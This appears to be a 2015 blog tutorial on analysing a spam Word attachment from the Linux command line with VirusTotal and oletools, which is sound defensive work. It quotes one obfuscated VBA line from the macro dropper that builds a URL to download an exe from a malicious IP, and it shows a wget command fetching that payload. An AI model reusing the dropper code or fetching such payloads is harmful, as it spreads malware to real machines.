Thursday, January 29, 2015

Malware Analysis from Linux CLI

Analyze SPAM malware from Linux CLI

A good source to get malware samples is the mail spam, in this case I used a gmail account but is better to use custom domains and propagate mail addresses publishing in web, social networks, … so harvesters can find them.

Let’s check the mail with mutt and go to the Spam folder.

Sadly there are always something new in this folder, this time an American Airlanes mail.

We need to check the links and attachments.

The link seems to be legal, you can check it with whois aa.com and with Virustotal API, I use VT.py but there a lot of great scripts on this page https://www.virustotal.com/en/documentation/public-api/.

itsuugo@linux01:~$  vt -d aa.com -adi -wdi
Status : Domain found in dataset

[+] Alexa domain info
        aa.com is one of the top 10,000 sites in the world and is in the A category

[+] WOT domain info
+---------------------------+----------------------+
|           Name            |        Value         |
+===========================+======================+
|    Vendor reliability     |      Excellent       |
+---------------------------+----------------------+
|       Child safety        |      Excellent       |
+---------------------------+----------------------+
|      Trustworthiness      |      Excellent       |
+---------------------------+----------------------+
|          Privacy          |      Excellent       |
+---------------------------+----------------------+

[+] Passive DNS replication
+---------------------------+----------------------+
|       last_resolved       |      ip_address      |
+===========================+======================+
|    2015-01-03 00:00:00    |     23.45.40.14      |
+---------------------------+----------------------+

Let’s look the attachment, we are going to save to a local folder and send it to VirusTotal:

itsuugo@linux01:~/malware$ vt -f 20152701-7203849_ticket.doc
Nothing found

        Results for MD5    : a0ba10cb6c9ceb3a79391552e570a129
        Results for SHA1   : 470e171a276b23207d3ab0fc1beca494e1810834
        Results for SHA256 : 698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a

        Status         : Scan request successfully queued, come back later for the report
        Permanent link : https://www.virustotal.com/file/698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a/analysis/1422529600/


itsuugo@linux01:~/malware$ vt -f 470e171a276b23207d3ab0fc1beca494e1810834

Looking for:
        470e171a276b23207d3ab0fc1beca494e1810834

Scanned on :
        2015-01-29 10:09:47

Detections:
         13/56 Positives/Total

+----------------+---------------------------------+--------------+-------------+
|  Vendor name   |             Result              |   Version    | Last Update |
+================+=================================+==============+=============+
|         Sophos | Troj/DocDl-EI                   | 4.98.0       |  20150129   |
+----------------+---------------------------------+--------------+-------------+
|      Kaspersky | Trojan-Downloader.VBS.Agent.akg | 15.0.1.10    |  20150129   |
+----------------+---------------------------------+--------------+-------------+
|     TrendMicro | W97M_DLOAD.VVPZ                 | 9.740.0.1012 |  20150129   |
+----------------+---------------------------------+--------------+-------------+

        Results for MD5    : a0ba10cb6c9ceb3a79391552e570a129
        Results for SHA1   : 470e171a276b23207d3ab0fc1beca494e1810834
        Results for SHA256 : 698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a

        Permanent Link : https://www.virustotal.com/file/698870d9bf61bca2ac972ee1c5b7e65aa522a4379cd7deee6732470ab5f7529a/analysis/1422526187/

Ok, we know that something evil is inside, we are going to use oletools to investigate. You can find the output report in this paste http://pastebin.com/LtPFWURZ.

The report si meaningful, as it says, the script runs when the Word document is opened. The code is obfuscated, but we can see that it gathers information from the computer and then downloads an exe file.

  Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://146.185.213.103/upd/install" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

You can find in Google cache an older version of this vba malware.

We can download a sample with wget using the same headers:

wget --header="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25" http://146.185.213.103/upd/install.exe 

Connecting to 146.185.213.103:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150016 (146K) [application/octet-stream]
Saving to: ‘install.exe100%[======================================>] 150,016     97.1KB/s   in 1.5s   

‘install.exe’ saved [150016/150016]

and send it to VirusTotal

itsuugo@linux01:~/malware$ vt -f install.exe 
Nothing found

        Results for MD5    : 0ae67b36cd78c74bb60d34cf1a65de04
        Results for SHA1   : 8823c6de3811fb7c084da3dbdce1a2ac4488f184
        Results for SHA256 : 1abfe66059db90e41ab278abf43cea737ac76acc8159bf7806e2d41e1467baad

        Status         : Scan request successfully queued, come back later for the report
        Permanent link : https://www.virustotal.com/file/1abfe66059db90e41ab278abf43cea737ac76acc8159bf7806e2d41e1467baad/analysis/1422532187/


itsuugo@linux01:~/malware$ vt -f 8823c6de3811fb7c084da3dbdce1a2ac4488f184

Looking for:
        8823c6de3811fb7c084da3dbdce1a2ac4488f184

Scanned on : 
        2015-01-29 11:49:47

Detections:
         0/57 Positives/Total

It’s odd that a spam attachment has an undetectable malware, fortunately we can use Virustotal to investigate checking for the url:

itsuugo@linux01:~/malware$ vt -ur  http://146.185.213.103/upd/install.exe 

Searching for url(s) report: 
        http://146.185.213.103/upd/install.exe

Scanned on : 
        2015-01-29 04:06:05

Detections:
         3/61 Positives/Total

Scanned url :
         http://146.185.213.103/upd/install.exe

        Permanent Link : https://www.virustotal.com/url/285daff50d5cf0ccbd8043940832116a7ba6912a8380335861f8c7178e6e2207/analysis/1422504365/

We neet to abandon the CLI and open a browser to that links and we can see that the file has changed:

    VirusTotal

SHA256: beb7f21e733149a0da6e25fec245829eeb7e45348f29be15336f18f2afe1a137
File name:  winlogin.exe
Detection ratio:    3 / 57
Analysis date:  2015-01-28 21:04:35 UTC ( 17 hours, 40 minutes ago ) View latest

But seems the server is used for spreading more of this things, so I think it’s safe to blacklist this IP.

itsuugo@linux01:~/malware$  vt -v -i 146.185.213.103

[+] Status 146.185.213.103: IP address found in dataset

[+] Latest detected files that were downloaded from this domain/ip

+-----------------+------------+----------------------+------------------------------------------------------------------------+
|    positives    |   total    |         date         |                                 sha256                                 |
+=================+============+======================+========================================================================+
|        5        |     57     | 2015-01-29 04:03:22  |    6efc7fb3010cf9606b7498f91810ec925fedd9ee192792299839aa657325dd4f    |
+-----------------+------------+----------------------+------------------------------------------------------------------------+

[+] Latest undetected files that were downloaded from this domain/ip

+-----------------+------------+----------------------+------------------------------------------------------------------------+
|    positives    |   total    |         date         |                                 sha256                                 |
+=================+============+======================+========================================================================+
|        --       |     57     | 2015-01-29 13:47:50  |    075865abff746c42f2b0afdfc190edc662876127ee41e91d9da83464e6b5ba7c    |
+-----------------+------------+----------------------+------------------------------------------------------------------------+

[+] Latest detected URLs

+-----------+-------+----------------------+-----------------------------------------+
| positives | total |      scan_date       |                   url                   |
+===========+=======+======================+=========================================+
|     2     |  61   | 2015-01-29 13:47:46  | http://146.185.213.103/upd/install      |
+-----------+-------+----------------------+-----------------------------------------+
|     2     |  61   | 2015-01-29 06:25:53  | http://146.185.213.103/                 |
+-----------+-------+----------------------+-----------------------------------------+
|     5     |  61   | 2015-01-29 04:03:18  | http://146.185.213.103/upd2/install.exe |
+-----------+-------+----------------------+-----------------------------------------+